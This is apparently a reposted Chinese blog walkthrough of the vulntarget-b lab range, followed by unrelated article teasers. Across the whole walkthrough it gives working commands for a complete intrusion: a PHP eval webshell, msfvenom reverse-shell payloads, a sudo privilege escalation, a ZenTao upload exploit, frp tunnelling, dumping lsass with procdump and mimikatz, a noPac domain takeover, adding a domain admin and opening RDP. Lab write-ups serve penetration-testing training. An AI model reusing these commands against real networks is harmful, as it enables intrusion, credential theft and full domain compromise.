【靶场实战】vulntarget-b漏洞靶场实战

news/2024/9/28 11:15:27

免责申明

本公众号的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

靶场介绍

vulntarget-b漏洞靶场是由vulntarget大佬团队自己设计搭建的靶场,其中涵盖Web漏洞、主机漏洞、域漏洞、工控漏洞等等。

靶场拓扑

靶场实战

将应用服务器的IP地址设置为与攻击机与Kali同一网段

端口扫描

nmap -sT 192.168.52.129

发现目标开启了80、81等端口,浏览器访问80、81端口

80端口

81端口

针对81端口进行简单信息收集发现当前CMS是极致CMS

访问admin.php

尝试弱口令登录,admin/admin123

漏洞利用

查看相关漏洞文库发现,极致CMS存在后台文件编辑插件 后台任意文件写入漏洞

漏洞文库参考:https://www.saury.net/957.html


直接下载、安装、配置

随便输入密码,进入编辑

再次输入密码就会看到源码,且可以修改

在index.php文件中直接加入一句话木马,例如eval($_POST[xiaoc]);

获取webshell

添加成功后使用蚁剑连接

执行ipconfig时发现回显ret= 127

宝塔禁用函数,直接使用蚁剑插件就可以bypass

选择“绕过 disable functions”插件,使用插件中的“PHP7 GC UAF”

使用“/sbin/ifconfig”查看当前网卡地址,存在双网卡

MSF上线

利用MSF生成反向连接木马

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.52.129 LPORT=5555 -f elf > 5555.elf

将生成的木马上传到目标应用服务器

在kali攻击机上监听5555端口,并直接执行目标服务器上的木马

获取MSF会话成功

centos7 提权

由于当前权限是www权限,需要提升权限

寻找可以提权的模块,共找到7个模块

run post/multi/recon/local_exploit_suggester

使用exploit/linux/local/sudo_baron_samedit模块提权,大佬的没有成功,使用解密的password登录服务器重写执行5555.elf文件,就可以获取到root权限

我这边直接获取到root权限

*] Started reverse TCP handler on 0.0.0.0:5555 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. sudo 1.8.23 is a vulnerable build.
[*] Writing '/tmp/NqGUgg.py' (23630 bytes) ...
[*] A successful exploit will create a new root user msf with password lefipzbnlzhagow
[*] Brute forcing ASLR (can take several minutes)...
[+] Success! Created new user msf with password lefipzbnlzhagow
[*] Writing '/tmp/KDjo4bmF' (266 bytes) ...
[*] Sending stage (3045380 bytes) to 192.168.52.129
[+] Deleted /tmp/NqGUgg.py
[+] Deleted /tmp/KDjo4bmF
[*] Cleaning up /etc/passwd
[*] Meterpreter session 2 opened (192.168.52.128:5555 -> 192.168.52.129:59198) at 2024-06-20 09:05:19 +0800meterpreter > getuid 
Server username: root

使用模块:auxiliary/scanner/portscan/tcp 进行同C段端口探测

msf6 auxiliary(scanner/portscan/tcp) > run[+] 10.0.20.30:           - 10.0.20.30:80 - TCP OPEN
[+] 10.0.20.30:           - 10.0.20.30:21 - TCP OPEN
[+] 10.0.20.30:           - 10.0.20.30:22 - TCP OPEN
[*] 10.0.20.0/24:         - Scanned  31 of 256 hosts (12% complete)
[*] 10.0.20.0/24:         - Scanned  61 of 256 hosts (23% complete)
[+] 10.0.20.66:           - 10.0.20.66:8080 - TCP OPEN
[*] 10.0.20.0/24:         - Scanned  90 of 256 hosts (35% complete)
[*] 10.0.20.0/24:         - Scanned 119 of 256 hosts (46% complete)
[*] 10.0.20.0/24:         - Scanned 134 of 256 hosts (52% complete)
[*] 10.0.20.0/24:         - Scanned 155 of 256 hosts (60% complete)
[*] 10.0.20.0/24:         - Scanned 181 of 256 hosts (70% complete)
[*] 10.0.20.0/24:         - Scanned 211 of 256 hosts (82% complete)
[*] 10.0.20.0/24:         - Scanned 241 of 256 hosts (94% complete)
[*] 10.0.20.0/24:         - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

发现在同一网段10.0.20.66开启了8080端口

frp使用

msf代理在蚁剑的地方,上传大一点的文件经常会报错,所以使用frp代理稳定一点

在kali运行frps,frps.ini配置文件为

[common]
bind_ip = 10.30.7.77    //kali IP
bind_port = 7000

在kali执行
./frps -c frps.ini

将frpc、socks.ini上传到目标服务器

socks.ini的配置如下:

[common]
server_addr = 192.168.52.128
server_port = 7001[socks_proxy]
type = tcp
remote_port =8888
plugin = socks5

在目标服务器执行frpc
./frpc -c socks.ini

命令执行后,kali显示success

代理frp流量访问8080端口,admin/Admin123进入后台

拿下域成员win10

获取当前禅道版本号12.4.2,禅道 12.4.2 存在后台任意文件上传漏洞 #CNVD-C-2020-121325

也可以通过访问http://10.0.20.66:8080/index.php?mode=getconfig获取版本信息

在应用服务器上开启python的http服务

python -c 'import pty; pty.spawn("/bin/bash")'  //交互式
python -m SimpleHTTPServer 4567

将1.php一句话木马上传到应用服务器上

访问http://10.0.20.30:4567/1.php 可以直接下载木马

根据漏洞利用的要求需要对HTTP://10.0.20.30:4567/1.php进行Base64编码

HTTP://10.0.20.30:4567/1.php ==> aHR0cDovLzEwLjAuMjAuMzA6NDU2Ny8xLnBocA==

base64在线编码网址:https://base64.us/


利用POC1,不成功

利用poc2,保存成功

蚁剑连接成功!!!!!需要使用frp socks5代理

火绒免杀 MSF上线

生成反向连接木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.20.33 LPORT=5555 -f exe -o ceshi.exe

对木马进行免杀处理

需要使用提权后的session会话添加路由,要不然不能反弹shell

进入session2执行如下命令:

run autoroute -s 10.0.20.66/24
run autoroute -s 10.0.20.30/24


添加路由

获取最低权限 iis apppool\zentao

win10提权

使用MSF自带的提权工具
meterpreter > run post/multi/recon/local_exploit_suggester

 #   Name                                                           Potentially Vulnerable?  Check Result-   ----                                                           -----------------------  ------------1   exploit/windows/local/bits_ntlm_token_impersonation            Yes                      The target appears to be vulnerable.                                                                                       2   exploit/windows/local/bypassuac_fodhelper                      Yes                      The target appears to be vulnerable.                                                                                       3   exploit/windows/local/bypassuac_sluihijack                     Yes                      The target appears to be vulnerable.                                                                                       4   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   Yes                      The target appears to be vulnerable. Vulnerable Windows 10 v1909 build detected!                                           5   exploit/windows/local/cve_2020_1048_printerdemon               Yes                      The target appears to be vulnerable.                                                                                       6   exploit/windows/local/cve_2020_1337_printerdemon               Yes                      The target appears to be vulnerable.                                                                                       7   exploit/windows/local/ms16_075_reflection                      Yes                      The target appears to be vulnerable.                                                                                       

都尝试了好像不行

上传提权工具 cve-2021-1732.exe

直接用cve-2021-1732.exe执行木马


成功获取管理员权限

sysinfo查看系统信息,当前系统为X64,需要做进程迁移到X64进程上

kiwi模块同时支持32位和64位的系统,但是该模块默认是加载32位的系统,所以如果目标主机是64位系统的话,直接默认加载该模块会导致很多功能无法使用。所以如果目标系统是64位的,则必须先查看系统进程列表,然后将meterpreter进程迁移到一个64位程序的进程中,才能加载kiwi并且查看系统明文。如果目标系统是32位的,则没有这个限制。

把进程迁移到 PID为844的进程

meterpreter > migrate 844
[*] Migrating from 4488 to 844...
[*] Migration completed successfully.

加载kiwi:load kiwi
读取凭据:creds_all

获取到本地管理密码和域控密码

获取域成员密码另一种方法

原文章是没有读取到域成员密码的,在没有获取域成员密码时,可采取如下方法:

上传procdump64.exe

meterpreter > upload /home/kali/procdump64.exe
[*] Uploading  : /home/kali/procdump64.exe -> procdump64.exe
[*] Uploaded 414.90 KiB of 414.90 KiB (100.0%): /home/kali/procdump64.exe -> procdump64.exe
[*] Completed  : /home/kali/procdump64.exe -> procdump64.exe

执行命令下载lsass文件
C:\Windows\system32>procdump64.exe -accepteula -ma lsass.exe lsass.dmp

下载lsass到本地
meterpreter > download lsass.dmp

使用mimikatz.exe读取密码

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

获取域控win2016

CVE-2021-42287/CVE-2021-42278
得到win101的密码之后,使用最近的爆出的域内提权拿下域控,先上传nopac.exe

定位域控主机

获取到域控IP和hostname

获取票据
noPac.exe -domain vulntarget.com -user win101 -pass admin#123 /dc WIN-UH20PRD3EAO.vulntarget.com /mAccount test2 /mPassword admin@123 /service cifs /ptt

列域控目录
dir \\WIN-UH20PRD3EAO.vulntarget.com\c$

上传psexec,远程过去

添加一个域管账号


net user admin QWEasd@123 /add /domain
net group "Domain Admins" admin /add /domain

使用账密的psexec

PsExec64.exe \\10.0.10.100 -u  vulntarget\admin -p QWEasd@123 -s cmd.exe
开启win10远程,登录试试,修改防火墙策略netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
开启远程REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

再次运行,可以连接上

PsExec64.exe \\10.0.10.100 -u vulntarget\admin -p QWEasd@123 -s cmd.exe

拿下域控服务器!!!!!!!

关注公众号

关注公众号

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.ryyt.cn/news/45732.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈,一经查实,立即删除!

相关文章

详解Kubernetes Pod优雅退出

1、概述Pod优雅关闭是指在Kubernetes中,当Pod因为某种原因(如版本更新、资源不足、故障等)需要被终止时,Kubernetes不会立即强制关闭Pod,而是首先尝试以一种“优雅”的方式关闭Pod。这个过程允许Pod中的容器有足够的时间来响应终止信号(默认为SIGTERM),并在终止前完成必…

服务器存储误删所有lun的数据恢复解决方案

NetApp FAS3220是NetApp推出的中端存储阵列,针对NAS和SAN环境构建,被定制为虚拟化、私有云或传统、早先的用途,适用于从几TB到超过2PB的存储需求,提供数据保护,可扩展性,自动精简配置,精简克隆,备份和灾难恢复,下面就讲解NetApp FAS 3220存储的数据恢复的方法。 本次讲…

前 OpenAI 首席科学家建「安全超级智能」实验室;Meta 重组元宇宙团队丨 RTE 开发者日报 Vol.228

开发者朋友们大家好:这里是 「RTE 开发者日报」 ,每天和大家一起看新闻、聊八卦。我们的社区编辑团队会整理分享 RTE(Real-Time Engagement) 领域内「有话题的新闻」、「有态度的观点」、「有意思的数据」、「有思考的文章」、「有看点的会议」,但内容仅代表编辑的个人观点…

不推荐macos用户购买focusee付费的理由

分析了Focusee在macOS上的缺陷,包括色差严重、导出速度慢以及声卡配置冲突等问题,并分享了作者的退款经历。当时我为什么购买focusee需要同时录制摄像头和屏幕:录视频的时候经常需要同时展示自己和电脑屏幕的内容。 需要使用 zoom 功能:在录制过程中,偶尔需要放大特定区域…

迎接智算新挑战,天翼云亮相全球架构师峰会!

近日,ArchSummit全球架构师峰会在深圳隆重开幕,本次大会以“智能进阶. 架构重塑”为主题,探讨AI浪潮下,企业架构如何适应大模型和云原生的时代趋势,寻找既有应用成果又有成本效益的解决方案。国内外100余名顶尖专家齐聚一堂,围绕AI、大模型、云原生等话题展开深度交流。天…

窥探Mybatis配置到执行源码剖析

mybatis自动配置过程 首先我们项目中使用mybatis如果是mybatis的话会引入依赖 <dependency><groupId>com.baomidou</groupId><artifactId>mybatis-plus-boot-starter</artifactId><version>${mybatis-plus.version}</version></d…

5.21实验三 Web数据库程序设计

一、实验目的 通过使用JSP技术设计一个简单的数据库管理系统,了解展示页面和编辑页面的区别,掌握Web服务器与MySQL数据库的连接和数据库操作的方法,掌握使用Java语言编写JSP文件的方法。 二、实验内容和基本要求 从以下列举的四个数据库中,任选其一,或者自行定义其他数据库…

应对高温“烤”验,数据中心降温奇招来了!

近日,中国电子学会联合中国电子技术标准化研究院等单位,在安徽省合肥市举办“节能服务进企业”暨绿色数据中心对接推广活动。会议为天翼云存储资源盘活系统HBlock入选《国家工业和信息化领域节能降碳技术装备推荐目录(2024年版)》颁发荣誉证书;天翼云存储产品专家肖夏敏发…